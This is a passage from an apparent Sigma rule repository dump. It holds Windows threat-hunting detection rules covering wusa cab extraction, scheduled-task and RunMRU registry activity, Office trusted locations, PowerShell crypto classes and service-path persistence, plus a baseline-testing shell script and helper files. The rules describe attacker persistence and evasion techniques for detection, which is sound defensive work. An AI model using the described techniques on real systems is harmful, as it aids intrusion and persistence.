    "content": "title: Cab File Extraction Via Wusa.EXE\nid: 59b39960-5f9d-4a49-9cef-1e4d2c1d0cb9\nrelated:\n    - id: c74c0390-3e20-41fd-a69a-128f0275a5ea\n      type: derived\nstatus: test\ndescription: |\n    Detects execution of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument that is no longer supported.\nreferences:\n    - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-04\nmodified: 2024-08-15\ntags:\n    - attack.execution\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\wusa.exe'\n        CommandLine|contains: '/extract:'\n    condition: selection\nfalsepositives:\n    - The \"extract\" flag still works on older 'wusa.exe' versions, which could be a legitimate use (monitor the path of the cab being extracted)\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/registry/registry_event/registry_event_scheduled_task_creation.yml",
    "content": "title: Scheduled Task Created - Registry\nid: 93ff0ceb-e0ef-4586-8cd8-a6c277d738e3\nstatus: test\ndescription: Detects the creation of a scheduled task via Registry keys.\nreferences:\n    - https://center-for-threat-informed-defense.github.io/summiting-the-pyramid/analytics/task_scheduling/\n    - https://posts.specterops.io/abstracting-scheduled-tasks-3b6451f6a1c5\nauthor: Center for Threat Informed Defense (CTID) Summiting the Pyramid Team\ndate: 2023-09-27\ntags:\n    - attack.execution\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.s0111\n    - attack.t1053.005\n    - car.2013-08-001\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: registry_event\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\'\n            - '\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\'\n    condition: selection\nfalsepositives:\n    - Likely as this is a normal behaviour on Windows\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/registry/registry_set/registry_set_office_trusted_location.yml",
    "content": "title: Microsoft Office Trusted Location Updated\nid: a0bed973-45fa-4625-adb5-6ecdf9be70ac\nrelated:\n    - id: f742bde7-9528-42e5-bd82-84f51a8387d2\n      type: similar\nstatus: test\ndescription: Detects changes to the registry keys related to \"Trusted Location\" of Microsoft Office. Attackers might add additional trusted locations to avoid macro security restrictions.\nreferences:\n    - https://admx.help/?Category=Office2016&Policy=excel16.Office.Microsoft.Policies.Windows::L_TrustedLoc01\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-21\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1112\n    - detection.threat-hunting\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: 'Security\\Trusted Locations\\Location'\n        TargetObject|endswith: '\\Path'\n    filter_main_office_click_to_run:\n        Image|contains: ':\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\'\n        Image|endswith: '\\OfficeClickToRun.exe'\n    filter_main_office_apps:\n        Image|contains:\n            - ':\\Program Files\\Microsoft Office\\'\n            - ':\\Program Files (x86)\\Microsoft Office\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - During office installations or setup, trusted locations are added, which will trigger this rule.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/registry/registry_set/registry_set_powershell_crypto_namespace.yml",
    "content": "title: Registry Set With Crypto-Classes From The \"Cryptography\" PowerShell Namespace\nid: 1c2a3268-3881-414a-80af-a5b313b14c0e\nstatus: test\ndescription: |\n    Detects the setting of a registry inside the \"\\Shell\\Open\\Command\" value with PowerShell classes from the \"System.Security.Cryptography\" namespace.\n    The PowerShell namespace \"System.Security.Cryptography\" provides classes for on-the-fly encryption and decryption.\n    These can be used for example in decrypting malicious payload for defense evasion.\nreferences:\n    - https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography?view=net-8.0\n    - https://squiblydoo.blog/2023/11/07/october-2023-solarmarker/\nauthor: Andreas Braathen (mnemonic.io)\ndate: 2023-12-01\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1059.001\n    - attack.t1027.010\n    - attack.t1547.001\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection_key:\n        TargetObject|contains: '\\Shell\\Open\\Command'\n    selection_value_img:\n        Details|contains:\n            - 'powershell'\n            - 'pwsh'\n    selection_value_namespace:\n        Details|contains: 'System.Security.Cryptography.'\n    selection_value_classes:\n        Details|contains:\n            - '.AesCryptoServiceProvider'\n            - '.DESCryptoServiceProvider'\n            - '.DSACryptoServiceProvider'\n            - '.RC2CryptoServiceProvider'\n            - '.Rijndael'\n            - '.RSACryptoServiceProvider'\n            - '.TripleDESCryptoServiceProvider'\n    condition: all of selection_*\nfalsepositives:\n    - Classes are legitimately used, but less so when e.g. parents with low prevalence or decryption of content in temporary folders.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/registry/registry_set/registry_set_runmru_command_execution.yml",
    "content": "title: Command Executed Via Run Dialog Box - Registry\nid: f9d091f6-f1c7-4873-a24f-050b4a02b4dd\nrelated:\n    - id: a7df0e9e-91a5-459a-a003-4cde67c2ff5d\n      type: derived\nstatus: test\ndescription: |\n    Detects execution of commands via the run dialog box on Windows by checking values of the \"RunMRU\" registry key.\n    This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.\nreferences:\n    - https://www.forensafe.com/blogs/runmrukey.html\n    - https://medium.com/@shaherzakaria8/downloading-trojan-lumma-infostealer-through-capatcha-1f25255a0e71\n    - https://redcanary.com/blog/threat-intelligence/intelligence-insights-october-2024/\nauthor: Ahmed Farouk, Nasreddine Bencherchali\ndate: 2024-11-01\ntags:\n    - detection.threat-hunting\n    - attack.execution\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|contains: '\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU'\n    filter_main_mrulist:\n        TargetObject|endswith: '\\MRUList'\n    filter_optional_ping:\n        Details|contains: 'ping'\n    filter_optional_generic:\n        Details:\n            - '%appdata%\\1'\n            - '%localappdata%\\1'\n            - '%public%\\1'\n            - '%temp%\\1'\n            - 'calc\\1'\n            - 'dxdiag\\1'\n            - 'explorer\\1'\n            - 'gpedit.msc\\1'\n            - 'mmc\\1'\n            - 'notepad\\1'\n            - 'regedit\\1'\n            - 'services.msc\\1'\n            - 'winver\\1'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Likely\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/registry/registry_set/registry_set_service_image_path_user_controlled_folder.yml",
    "content": "title: Service Binary in User Controlled Folder\nid: 277dc340-0540-42e7-8efb-5ff460045e07\nrelated:\n    - id: c625c4c2-515d-407f-8bb6-456f65955669\n      type: obsolete\nstatus: test\ndescription: |\n    Detects the setting of the \"ImagePath\" value of a service registry key to a path controlled by a non-administrator user such as \"\\AppData\\\" or \"\\ProgramData\\\".\n    Attackers often use such directories for staging purposes.\n    This rule might also trigger on badly written software, where if an attacker controls an auto starting service, they might achieve persistence or privilege escalation.\n    Note that while ProgramData is a user controlled folder, software might apply strict ACLs which makes them only accessible to admin users. Remove such folders via filters if you experience a lot of noise.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\nauthor: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)\ndate: 2022-05-02\nmodified: 2024-03-25\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1112\n    - detection.threat-hunting\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains|all:\n            - 'ControlSet'\n            - '\\Services\\'\n        TargetObject|endswith: '\\ImagePath'\n        Details|contains:\n            - ':\\ProgramData\\'\n            - '\\AppData\\Local\\'\n            - '\\AppData\\Roaming\\'\n    filter_optional_zoom:\n        TargetObject|contains: '\\Services\\ZoomCptService'\n        Details|contains: 'C:\\Program Files\\Common Files\\Zoom\\Support\\CptService.exe'\n    filter_optional_mbami:\n        TargetObject|contains: '\\Services\\MBAMInstallerService'\n        Details|contains|all:\n            - 'C:\\Users\\'\n            - 'AppData\\Local\\Temp\\MBAMInstallerService.exe'\n    filter_main_windefend:\n        TargetObject|contains:\n            - '\\Services\\WinDefend\\'\n            - '\\Services\\MpKs'\n        Details|contains: 'C:\\ProgramData\\Microsoft\\Windows Defender\\'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/registry/registry_set/registry_set_shell_context_menu_tampering.yml",
    "content": "title: Shell Context Menu Command Tampering\nid: 868df2d1-0939-4562-83a7-27408c4a1ada\nstatus: test\ndescription: Detects changes to shell context menu commands. Use this rule to hunt for potential anomalies and suspicious shell commands.\nreferences:\n    - https://mrd0x.com/sentinelone-persistence-via-menu-context/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-03-06\ntags:\n    - attack.persistence\n    - detection.threat-hunting\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains|all:\n            - '\\Software\\Classes\\'\n            - '\\shell\\'\n            - '\\command\\'\n    condition: selection\nfalsepositives:\n    - Likely from new software installation suggesting to add context menu items. Such as \"PowerShell\", \"Everything\", \"Git\", etc.\nlevel: low\n"
  },
  {
    "path": "tests/check-baseline-local.sh",
    "content": "#!/bin/bash\n\nif [[ -z $(command -v jq) ]]; then\n    >&2 echo \"jq not found. Please install.\"\n    >&2 echo \"Exiting\"\n    exit 1\nfi\n\nif [[ -z $(command -v wget) ]]; then\n    >&2 echo \"wget not found. Please install.\"\n    >&2 echo \"Exiting\"\n    exit 1\nfi\n\nif [[ -z $(command -v xargs) ]]; then\n    >&2 echo \"xargs not found. Please install findutils.\"\n    >&2 echo \"Exiting\"\n    exit 1\nfi\n\nif [[ -z $(command -v tar) ]]; then\n    >&2 echo \"tar not found. Please install.\"\n    >&2 echo \"Exiting\"\n    exit 1\nfi\n\nif [[ -z $(command -v mktemp) ]]; then\n    >&2 echo \"mktemp not found. Please install coreutils.\"\n    >&2 echo \"Exiting\"\n    exit 1\nfi\n\nif [[ -z $(command -v realpath) ]]; then\n    >&2 echo \"realpath not found. Please install coreutils.\"\n    >&2 echo \"Exiting\"\n    exit 1\nfi\n\nOS=$(uname -s)\n\nif [[ \"${OS}\" != \"Linux\" && \"${OS}\" != \"Darwin\" ]]; then\n    >&2 echo \"This script only supports Linux and MacOS\"\n    >&2 echo \"$(uname -s) is not a supported OS\"\n    >&2 echo \"Exiting\"\n    exit 1\nfi\n\nSCRIPT=\"$(realpath $0)\"\nTOOLS=\"${SCRIPT%/*}\"\nSIGMA=\"${TOOLS%/*}\"\n\ndeclare -A PID2OS\n\nif [[ -n \"$1\" && -d \"$1\" && -r \"$1\" ]]; then\n    RULES=\"$1\"\nelse\n    RULES=\"${SIGMA}\"/rules\nfi\n\nTMP=$(mktemp -d)\nif [[ -z \"${TMP}\" || ! -d \"${TMP}\" || ! -w \"${TMP}\" ]]; then\n    >&2 echo \"Error: Created temporary directory ${TMP} is not writable.\"\n    >&2 echo \"Exiting\"\n    exit 1\nfi\n\n\ncd \"${TMP}\"\n\necho\necho \"Copy rules from ${SIGMA} to ${TMP}\"\ncp -r \"${RULES}\"/windows .\ncp -r \"${SIGMA}\"/rules-emerging-threats .\ncp -r \"${SIGMA}\"/rules-threat-hunting .\necho\necho \"Remove deprecated rules\"\ngrep -ERl \"^status: deprecated\" windows | xargs -r rm -v\necho\necho \"Download evtx-sigma-checker\"\nif [[ \"${OS}\" == \"Linux\" ]]; then\n    wget --no-verbose --progress=bar --show-progress https://github.com/NextronSystems/evtx-baseline/releases/latest/download/evtx-sigma-checker\nelif [[ \"${OS}\" == \"Darwin\" ]]; then\n    wget --no-verbose --progress=bar --show-progress https://github.com/NextronSystems/evtx-baseline/releases/latest/download/evtx-sigma-checker-darwin -O evtx-sigma-checker\nfi\nchmod +x evtx-sigma-checker\necho\n\necho\necho \"Starting EVTX checking in parallel...\"\n\n# Windows 7 32-bit\nOS=\"Windows 7 32-bit\"\n{\n    wget --quiet https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win7-x86.tgz\n    tar xzf win7-x86.tgz\n    echo \"  Checking for Sigma matches in $OS baseline\"\n    ./evtx-sigma-checker --log-source \"${SIGMA}\"/tests/thor.yml --evtx-path win7_x86/ --rule-path windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings-win7.json\n    echo \"  Finished Checking for Sigma matches in $OS baseline\"\n}&\npids+=($!)\nPID2OS[$!]=$OS\n\n# Windows 2022\nOS=\"Windows 2022\"\n{\n    wget --quiet https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win2022-evtx.tgz\n    tar xzf win2022-evtx.tgz\n    echo \"  Checking for Sigma matches in $OS baseline (this takes around 1 minute)\"\n    ./evtx-sigma-checker --log-source \"${SIGMA}\"/tests/thor.yml --evtx-path win2022-evtx/ --rule-path windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings-win2022.json\n    echo \"  Finished Checking for Sigma matches in $OS baseline\"\n}&\npids+=($!)\nPID2OS[$!]=$OS\n\n# Windows 10\nOS=\"Windows 10\"\n{\n    sleep 10\n    wget --quiet https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win10-client.tgz\n    tar xzf win10-client.tgz\n    echo \"  Checking for Sigma matches in $OS baseline (this takes around 2 minutes)\"\n    ./evtx-sigma-checker --log-source \"${SIGMA}\"/tests/thor.yml --evtx-path Logs_Client/ --rule-path windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings-win10.json\n    echo \"  Finished Checking for Sigma matches in $OS baseline\"\n}&\npids+=($!)\nPID2OS[$!]=$OS\n\n# Windows 2022 AD\nOS=\"Windows 2022 AD\"\n{\n    sleep 20\n    wget --quiet https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win2022-ad.tgz\n    tar xzf win2022-ad.tgz\n    echo \"  Checking for Sigma matches in $OS baseline (this takes around 2 minutes)\"\n    ./evtx-sigma-checker --log-source \"${SIGMA}\"/tests/thor.yml --evtx-path Win2022-AD/ --rule-path windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings-win2022-ad.json\n    echo \"  Finished Checking for Sigma matches in $OS baseline\"\n}&\npids+=($!)\nPID2OS[$!]=$OS\n\n# Windows 11\nOS=\"Windows 11\"\n{\n    sleep 30\n    wget --quiet https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win11-client.tgz\n    tar xzf win11-client.tgz\n    echo \"  Checking for Sigma matches in $OS baseline (this takes around 3 minutes)\"\n    ./evtx-sigma-checker --log-source \"${SIGMA}\"/tests/thor.yml --evtx-path Logs_Win11/ --rule-path windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings-win11.json\n    echo \"  Finished Checking for Sigma matches in $OS baseline\"\n}&\npids+=($!)\nPID2OS[$!]=$OS\n\n# Windows 11 2023\nOS=\"Windows 11 2023\"\n{\n    sleep 40\n    wget --quiet https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win11-client-2023.tgz\n    tar xzf win11-client-2023.tgz\n    echo \"  Checking for Sigma matches in $OS baseline (this takes around 3 minutes)\"\n    ./evtx-sigma-checker --log-source \"${SIGMA}\"/tests/thor.yml --evtx-path Logs_Win11_2023/ --rule-path windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings-win11-2023.json\n    echo \"  Finished Checking for Sigma matches in $OS baseline\"\n}&\npids+=($!)\nPID2OS[$!]=$OS\n\n# Windows 2022.0.20348 Azure\nOS=\"Windows 2022.0.20348 Azure\"\n{\n    sleep 50\n    wget --quiet https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win2022-0-20348-azure.tgz\n    tar xzf win2022-0-20348-azure.tgz\n    echo \"  Checking for Sigma matches in $OS baseline (this takes around 3 minutes)\"\n    ./evtx-sigma-checker --log-source \"${SIGMA}\"/tests/thor.yml --evtx-path win2022-0-20348-azure/ --rule-path windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings-win2022-0-20348-azure.json\n    echo \"  Finished Checking for Sigma matches in $OS baseline\"\n}&\npids+=($!)\nPID2OS[$!]=$OS\n\n# Sync with all background jobs\nfor pid in ${pids[*]}; do\n    echo \"===>  Waiting for PID $pid / ${PID2OS[$pid]}\"\n    wait $pid\ndone\n\necho\necho \"###############\"\necho \"##  MATCHES  ##\"\necho \"###############\"\necho\necho \"Windows 7 32-bit:\"\n\"${SIGMA}\"/.github/workflows/matchgrep.sh findings-win7.json \"${SIGMA}\"/.github/workflows/known-FPs.csv\necho\necho \"Windows 10:\"\n\"${SIGMA}\"/.github/workflows/matchgrep.sh findings-win10.json \"${SIGMA}\"/.github/workflows/known-FPs.csv\necho\necho \"Windows 11:\"\n\"${SIGMA}\"/.github/workflows/matchgrep.sh findings-win11.json \"${SIGMA}\"/.github/workflows/known-FPs.csv\necho\necho \"Windows 11 2023:\"\n\"${SIGMA}\"/.github/workflows/matchgrep.sh findings-win11-2023.json \"${SIGMA}\"/.github/workflows/known-FPs.csv\necho\necho \"Windows 2022:\"\n\"${SIGMA}\"/.github/workflows/matchgrep.sh findings-win2022.json \"${SIGMA}\"/.github/workflows/known-FPs.csv\necho\necho \"Windows 2022 AD:\"\n\"${SIGMA}\"/.github/workflows/matchgrep.sh findings-win2022-ad.json \"${SIGMA}\"/.github/workflows/known-FPs.csv\necho\necho \"Windows 2022.0.20348 Azure:\"\n\"${SIGMA}\"/.github/workflows/matchgrep.sh findings-win2022-0-20348-azure.json \"${SIGMA}\"/.github/workflows/known-FPs.csv\n\necho\nread -p  \"Removing temporary directory ${TMP}. Press Enter to continue.\" -s\necho\nrm -r \"${TMP}\"\necho \"Removed ${TMP}\"\necho \"Finished\"\n"
  },
  {
    "path": "tests/deprecated_rules.py",
    "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreate the summary of all the deprecated rules in deprecated.csv or deprecated.json\n\nRun using the command\n# python deprecated_rules.py --format {json, csv}\n\"\"\"\n\nfrom sigma.collection import SigmaCollection\nfrom sigma.rule import SigmaStatus, SigmaLevel\n\nimport argparse\nimport csv\nimport json\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-f\", \"--format\", choices=[\"csv\", \"json\"], default=\"csv\")\nargs = parser.parse_args()\n\npath_to_rules = [\n    \"deprecated\",\n]\n\n\ndef get_level(rule):\n    return rule.level if rule.status else SigmaLevel.MEDIUM\n\n\ndef get_modified_time(rule):\n    return rule.modified if rule.modified else rule.date\n\n\ndef format_rule(rule):\n    return {\n        \"id\": str(rule.id),\n        \"title\": rule.title,\n        \"date\": str(rule.date),\n        \"modified\": str(get_modified_time(rule)),\n        \"level\": str(get_level(rule)),\n    }\n\n\ndef save_file(rules, _format):\n    is_rule_deprecated = lambda rule: rule.status is SigmaStatus.DEPRECATED\n    filename_export = f\"./deprecated/deprecated.{_format}\"\n\n    raw_info = map(format_rule, filter(is_rule_deprecated, rules))\n    sort_info_secondary = sorted(raw_info, key=lambda d: d[\"id\"])\n    sort_info = sorted(sort_info_secondary, key=lambda d: d[\"modified\"])\n\n    with open(filename_export, encoding=\"UTF-8\", mode=\"w\", newline=\"\") as _file:\n        if _format == \"csv\":\n            fieldnames = [\"id\", \"title\", \"date\", \"modified\", \"level\"]\n            writer = csv.DictWriter(_file, fieldnames=fieldnames)\n            writer.writeheader()\n            writer.writerows(sort_info)\n        elif _format == \"json\":\n            json.dump(sort_info, _file, indent=4)\n\n\nif __name__ == \"__main__\":\n\n    rule_paths = SigmaCollection.resolve_paths(path_to_rules)\n    rule_collection = SigmaCollection.load_ruleset(rule_paths, collect_errors=True)\n    save_file(rule_collection, args.format)\n"
  },
  {
    "path": "tests/logsource.json",
    "content": "{\n    \"title\": \"Field name by logsource\",\n    \"version\": \"20251205\",\n    \"legit\":{\n        \"windows\":{\n            \"common\": [\"EventID\", \"Provider_Name\",\"Channel\",\"Computer\",\"Security_UserID\"],\n            \"empty\": [],\n            \"category\":{\n                \"process_creation\": [\"CommandLine\", \"Company\", \"CurrentDirectory\", \"Description\", \"FileVersion\",\n                                    \"Hashes\", \"Image\", \"IntegrityLevel\", \"LogonGuid\", \"LogonId\", \"OriginalFileName\",\n                                    \"ParentCommandLine\", \"ParentImage\", \"ParentProcessGuid\", \"ParentProcessId\",\n                                    \"ParentUser\", \"ProcessGuid\", \"ProcessId\", \"Product\", \"TerminalSessionId\", \"User\", \"GrandParentImage\"],\n                \"file_change\": [\"CreationUtcTime\", \"Image\", \"PreviousCreationUtcTime\", \"ProcessGuid\", \"ProcessId\", \"TargetFilename\", \"User\"],\n                \"network_connection\": [\"DestinationHostname\", \"DestinationIp\", \"DestinationIsIpv6\", \"DestinationPort\",\n                                    \"DestinationPortName\", \"Image\", \"Initiated\", \"ProcessGuid\", \"ProcessId\", \"Protocol\", \"SourceHostname\",\n                                    \"SourceIp\", \"SourceIsIpv6\", \"SourcePort\", \"SourcePortName\", \"User\", \"ParentImage\"],\n                \"sysmon_status\": [\"Configuration\", \"ConfigurationFileHash\", \"SchemaVersion\", \"State\", \"Version\"],\n                \"process_termination\":[\"Image\", \"ProcessGuid\", \"ProcessId\", \"User\"],\n                \"driver_load\":[\"Hashes\", \"ImageLoaded\", \"Signature\", \"SignatureStatus\", \"Signed\"],\n                \"image_load\":[\"Company\", \"Description\", \"FileVersion\", \"Hashes\", \"Image\", \"ImageLoaded\", \"OriginalFileName\", \"ProcessGuid\",\n                            \"ProcessId\", \"Product\", \"Signature\", \"SignatureStatus\", \"Signed\", \"User\"],\n                \"create_remote_thread\":[\"NewThreadId\", \"SourceImage\", \"SourceProcessGuid\", \"SourceProcessId\", \"SourceUser\", \"StartAddress\",\n                                        \"StartFunction\", \"StartModule\", \"TargetImage\", \"TargetProcessGuid\", \"TargetProcessId\", \"TargetUser\"],\n                \"raw_access_thread\":[\"Device\", \"Image\", \"ProcessGuid\", \"ProcessId\", \"User\"],\n                \"process_access\":[\"CallTrace\", \"GrantedAccess\", \"SourceImage\", \"SourceProcessGUID\", \"SourceProcessId\", \"SourceThreadId\",\n                                \"SourceUser\", \"TargetImage\", \"TargetProcessGUID\", \"TargetProcessId\", \"TargetUser\"],\n                \"raw_access_read\":[\"CreationUtcTime\", \"Image\", \"ProcessGuid\", \"ProcessId\", \"TargetFilename\", \"User\"],\n                \"file_event\":[\"ProcessGuid\", \"ProcessId\", \"Image\", \"TargetFilename\", \"CreationUtcTime\", \"User\"],\n                \"file_executable_detected\":[\"ProcessGuid\", \"ProcessId\", \"Image\", \"TargetFilename\", \"Hashes\", \"User\"],\n                \"registry_add\":[\"EventType\", \"ProcessGuid\", \"ProcessId\", \"Image\", \"TargetObject\", \"User\"],\n                \"registry_delete\":[\"Details\", \"EventType\", \"Image\", \"ProcessGuid\", \"ProcessId\", \"TargetObject\"],\n                \"registry_set\":[\"Details\", \"EventType\", \"Image\", \"ProcessGuid\", \"ProcessId\", \"TargetObject\", \"User\"],\n                \"registry_rename\":[\"EventType\", \"Image\", \"NewName\", \"ProcessGuid\", \"ProcessId\", \"TargetObject\", \"User\"],\n                \"registry_event\":[\"Details\", \"EventType\", \"Image\", \"NewName\", \"ProcessGuid\", \"ProcessId\", \"TargetObject\", \"User\"],\n                \"create_stream_hash\":[\"Contents\", \"CreationUtcTime\", \"Hash\", \"Image\", \"ProcessGuid\", \"ProcessId\", \"TargetFilename\", \"User\"],\n                \"pipe_created\":[\"EventType\", \"Image\", \"PipeName\", \"ProcessGuid\", \"ProcessId\", \"User\"],\n                \"wmi_event\":[\"Consumer\", \"Destination\", \"EventNamespace\", \"EventType\", \"Filter\", \"Name\", \"Operation\", \"Query\", \"Type\", \"User\"],\n                \"dns_query\":[\"Image\", \"ProcessGuid\", \"ProcessId\", \"QueryName\", \"QueryResults\", \"QueryStatus\", \"User\"],\n                \"file_delete\":[\"Archived\", \"Hashes\", \"Image\", \"IsExecutable\", \"ProcessGuid\", \"ProcessId\", \"TargetFilename\", \"User\"],\n                \"clipboard_capture\":[\"Archived\", \"ClientInfo\", \"Hashes\", \"Image\", \"ProcessGuid\", \"ProcessId\", \"Session\", \"User\"],\n                \"process_tampering\":[\"Image\", \"ProcessGuid\", \"ProcessId\", \"Type\", \"User\"],\n                \"file_block\":[\"Hashes\", \"Image\", \"ProcessGuid\", \"ProcessId\", \"TargetFilename\", \"User\"],\n                \"ps_module\":[\"ContextInfo\", \"UserData\", \"Payload\"],\n                \"ps_script\":[\"MessageNumber\", \"MessageTotal\", \"ScriptBlockText\", \"ScriptBlockId\", \"Path\"],\n                \"file_access\":[\"Irp\", \"FileObject\", \"IssuingThreadId\", \"CreateOptions\", \"CreateAttributes\", \"ShareAccess\", \"FileName\"],\n                \"file_rename\":[\"Irp\", \"FileObject\", \"FileKey\", \"ExtraInformation\", \"IssuingThreadId\", \"InfoClass\", \"FilePath\"],\n                \"ps_classic_start\":[],\n                \"ps_classic_provider_start\":[],\n                \"sysmon_error\":[]\n            },\n            \"service\":{\n                \"bitlocker\": [\"VolumeName\", \"VolumeMountPoint\", \"ProtectorGUID\", \"ProtectorType\"],\n                \"bits-client\":[\"RemoteName\", \"LocalName\", \"processPath\", \"processId\"],\n                \"codeintegrity-operational\":[\"FileNameLength\", \"FileNameBuffer\", \"ProcessNameLength\", \"ProcessNameBuffer\",\n                                            \"RequestedPolicy\", \"ValidatedPolicy\", \"Status\"],\n                \"diagnosis-scripted\": [\"PackagePath\", \"PackageId\"],\n                \"firewall-as\":[\"Action\", \"ApplicationPath\", \"ModifyingApplication\"],\n                \"ldap\":[\"ScopeOfSearch\", \"SearchFilter\", \"DistinguishedName\", \"AttributeList\", \"ProcessId\"],\n                \"ntlm\":[\"CallerPID\", \"ClientDomainName\", \"ClientLUID\", \"ClientUserName\", \"DomainName\", \"MechanismOID\",\n                        \"ProcessName\", \"SChannelName\", \"SChannelType\", \"TargetName\", \"UserName\", \"WorkstationName\"],\n                \"openssh\":[\"process\", \"payload\"],\n                \"security-mitigations\":[\"ProcessPathLength\", \"ProcessPath\", \"ProcessCommandLineLength\", \"ProcessCommandLine\",\n                                        \"ProcessId\", \"ProcessCreateTime\", \"ProcessStartKey\", \"ProcessSignatureLevel\",\n                                        \"ProcessSectionSignatureLevel\", \"ProcessProtection\", \"TargetThreadId\", \"TargetThreadCreateTime\",\n                                        \"RequiredSignatureLevel\", \"SignatureLevel\", \"ImageNameLength\", \"ImageName\"],\n                \"shell-core\":[\"Name\", \"AppID\", \"Flags\"],\n                \"smbclient-security\":[\"Reason\", \"Status\", \"ShareNameLength\", \"ShareName\", \"ObjectNameLength\", \"ObjectName\",\n                                    \"UserNameLength\", \"UserName\", \"ServerNameLength\", \"ServerName\"],\n                \"smbclient-connectivity\":[],\n                \"smbserver-connectivity\":[],\n                \"taskscheduler\":[\"TaskName\", \"UserContext\", \"Path\", \"ProcessID\", \"Priority\", \"UserName\"],\n                \"terminalservices-localsessionmanager\":[\"User\", \"SessionID\", \"Address\"],\n                \"iis\":[\"date\", \"time\", \"c-ip\", \"cs-username\", \"s-sitename\", \"s-computername\", \"s-ip\", \"cs-method\",\n                        \"cs-uri-stem\", \"cs-uri-query\", \"s-port\", \"cs-method\", \"sc-status\", \"sc-win32-status\",\n                        \"sc-bytes\", \"cs-bytes\", \"time-taken\", \"cs-version\", \"cs-host\", \"cs-user-agent\",\n                        \"cs-referer\", \"cs-cookie\"],\n                \"application\":[],\n                \"sysmon\":[],\n                \"powershell\":[],\n                \"powershell-classic\":[],\n                \"security\":[],\n                \"system\":[],\n                \"windefend\":[],\n                \"wmi\":[],\n                \"microsoft-servicebus-client\":[],\n                \"printservice-operational\":[],\n                \"driver-framework\":[],\n                \"dns-server-analytic\":[],\n                \"dns-server\":[],\n                \"printservice-admin\":[],\n                \"msexchange-management\":[],\n                \"applocker\":[],\n                \"vhdmp\":[],\n                \"appxdeployment-server\":[\"Path\", \"AppId\", \"FilePath\", \"ErrorCode\", \"DeploymentOperation\", \"PackageFullName\", \"PackageSourceUri\", \"PackageDisplayName\", \"CallingProcess\",\"Flags\", \"HasFullTrust\"],\n                \"appxpackaging-om\":[\"subjectName\"],\n                \"lsa-server\":[\"TargetUserSid\", \"TargetUserName\", \"TargetDomainName\", \"TargetLogonId\", \"TargetLogonGuid\", \"EventOrginal\", \"EventCountTotal\", \"SidList\"],\n                \"dns-client\":[\"QueryName\", \"QueryType\", \"QueryOptions\", \"QueryStatus\", \"QueryResults\", \"NetworkIndex\", \"InterfaceIndex\", \"Status\", \"ClientPID\", \"QueryBlob\", \"DnsServerIpAddress\", \"ResponseStatus\", \"SendBlob\", \"SendBlobContext\", \"AddressLength\", \"Address\"],\n                \"appmodel-runtime\":[\"ProcessID\", \"PackageName\", \"ImageName\", \"ApplicationName\", \"Message\"],\n                \"capi2\":[],\n                \"certificateservicesclient-lifecycle-system\":[],\n                \"iis-configuration\":[ \"PhysicalPath\",\"ConfigPath\",\"EffectiveLocationPath\",\"Configuration\",\"TokenCacheModule\",\"EditOperationType\",\"OldValue\",\"NewValue\"]\n            }\n        },\n        \"linux\":{\n            \"common\": [],\n            \"empty\": [],\n     